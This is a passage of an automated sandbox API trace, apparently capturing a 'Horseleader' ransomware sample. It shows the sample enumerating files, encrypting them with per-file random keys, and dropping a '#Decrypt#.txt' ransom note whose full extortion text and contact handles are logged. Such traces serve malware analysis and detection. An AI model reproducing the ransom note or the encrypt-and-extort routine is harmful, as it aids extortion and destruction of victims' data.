0x7db828 [0234.285] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*") returned 62 [0234.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.286] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\.") returned 62 [0234.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.286] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.286] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.286] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\..") returned 63 [0234.286] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.286] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.286] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.286] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.286] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 76 [0234.286] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.286] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.286] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.286] lstrlenW (lpString=".testttjffg") returned 11 [0234.286] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.286] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.286] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.287] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.287] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.287] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\#Decrypt#.txt") returned 74 [0234.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.287] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.287] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.288] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.288] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.289] CloseHandle (hObject=0x158) returned 1 [0234.289] GetProcessHeap () returned 0x780000 [0234.289] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.289] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bbeec8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x41bbeec8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44c363f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TipBand.dll", cAlternateFileName="")) returned 1 [0234.289] lstrcmpiW (lpString1="TipBand.dll", lpString2="Windows") returned -1 [0234.289] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 66 [0234.289] StrStrIW (lpFirst="TipBand.dll", lpSrch=".horseleader") returned 0x0 [0234.289] lstrcmpW (lpString1="TipBand.dll", lpString2="#Decrypt#.txt") returned 1 [0234.289] lstrcmpW (lpString1="TipBand.dll", lpString2="_uninstalling_.png") returned 1 [0234.289] lstrlenW (lpString=".testttjffg") returned 11 [0234.289] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll", lpSrch=".testttjffg") returned 0x0 [0234.289] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.289] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.290] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6a2945, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5d6a2945, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0234.290] lstrcmpiW (lpString1="TipRes.dll", lpString2="Windows") returned -1 [0234.290] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 65 [0234.290] StrStrIW (lpFirst="TipRes.dll", lpSrch=".horseleader") returned 0x0 [0234.290] lstrcmpW (lpString1="TipRes.dll", lpString2="#Decrypt#.txt") returned 1 [0234.290] lstrcmpW (lpString1="TipRes.dll", lpString2="_uninstalling_.png") returned 1 [0234.290] lstrlenW (lpString=".testttjffg") returned 11 [0234.290] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll", lpSrch=".testttjffg") returned 0x0 [0234.290] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.290] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.290] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7038f2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x3d7038f2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0234.290] lstrcmpiW (lpString1="tipresx.dll", lpString2="Windows") returned -1 [0234.290] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned 66 [0234.290] StrStrIW (lpFirst="tipresx.dll", lpSrch=".horseleader") returned 0x0 [0234.290] lstrcmpW (lpString1="tipresx.dll", lpString2="#Decrypt#.txt") returned 1 [0234.290] lstrcmpW (lpString1="tipresx.dll", lpString2="_uninstalling_.png") returned 1 [0234.290] lstrlenW (lpString=".testttjffg") returned 11 [0234.290] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll", lpSrch=".testttjffg") returned 0x0 [0234.290] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.290] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.291] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa125f634, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa125f634, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa1285794, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x130600, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0234.291] lstrcmpiW (lpString1="tipskins.dll", lpString2="Windows") returned -1 [0234.291] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll") returned 67 [0234.291] StrStrIW (lpFirst="tipskins.dll", lpSrch=".horseleader") returned 0x0 [0234.291] lstrcmpW (lpString1="tipskins.dll", lpString2="#Decrypt#.txt") returned 1 [0234.291] lstrcmpW (lpString1="tipskins.dll", lpString2="_uninstalling_.png") returned 1 [0234.291] lstrlenW (lpString=".testttjffg") returned 11 [0234.291] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll", lpSrch=".testttjffg") returned 0x0 [0234.291] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.291] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.291] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1213373, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa1213373, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa12394d3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7ae00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0234.291] lstrcmpiW (lpString1="tiptsf.dll", lpString2="Windows") returned -1 [0234.291] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll") returned 65 [0234.291] StrStrIW (lpFirst="tiptsf.dll", lpSrch=".horseleader") returned 0x0 [0234.291] lstrcmpW (lpString1="tiptsf.dll", lpString2="#Decrypt#.txt") returned 1 [0234.291] lstrcmpW (lpString1="tiptsf.dll", lpString2="_uninstalling_.png") returned 1 [0234.291] lstrlenW (lpString=".testttjffg") returned 11 [0234.291] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll", lpSrch=".testttjffg") returned 0x0 [0234.291] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3dda83b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3dda83b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3dda83b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0234.292] lstrcmpiW (lpString1="tpcps.dll", lpString2="Windows") returned -1 [0234.292] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll") returned 64 [0234.292] StrStrIW (lpFirst="tpcps.dll", lpSrch=".horseleader") returned 0x0 [0234.292] lstrcmpW (lpString1="tpcps.dll", lpString2="#Decrypt#.txt") returned 1 [0234.292] lstrcmpW (lpString1="tpcps.dll", lpString2="_uninstalling_.png") returned 1 [0234.292] lstrlenW (lpString=".testttjffg") returned 11 [0234.292] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll", lpSrch=".testttjffg") returned 0x0 [0234.292] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0234.292] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0234.292] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned 60 [0234.292] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0234.292] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0234.292] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.292] GetProcessHeap () returned 0x780000 [0234.293] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*") returned 62 [0234.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.293] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\.") returned 62 [0234.293] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.293] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.293] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\..") returned 63 [0234.293] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.293] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.293] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6eb476, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a6eb476, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a6eb476, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.293] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui") returned 76 [0234.293] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.294] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.294] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.294] lstrlenW (lpString=".testttjffg") returned 11 [0234.294] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.294] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.294] CryptEncrypt (in: hKey=0x7c65a0, 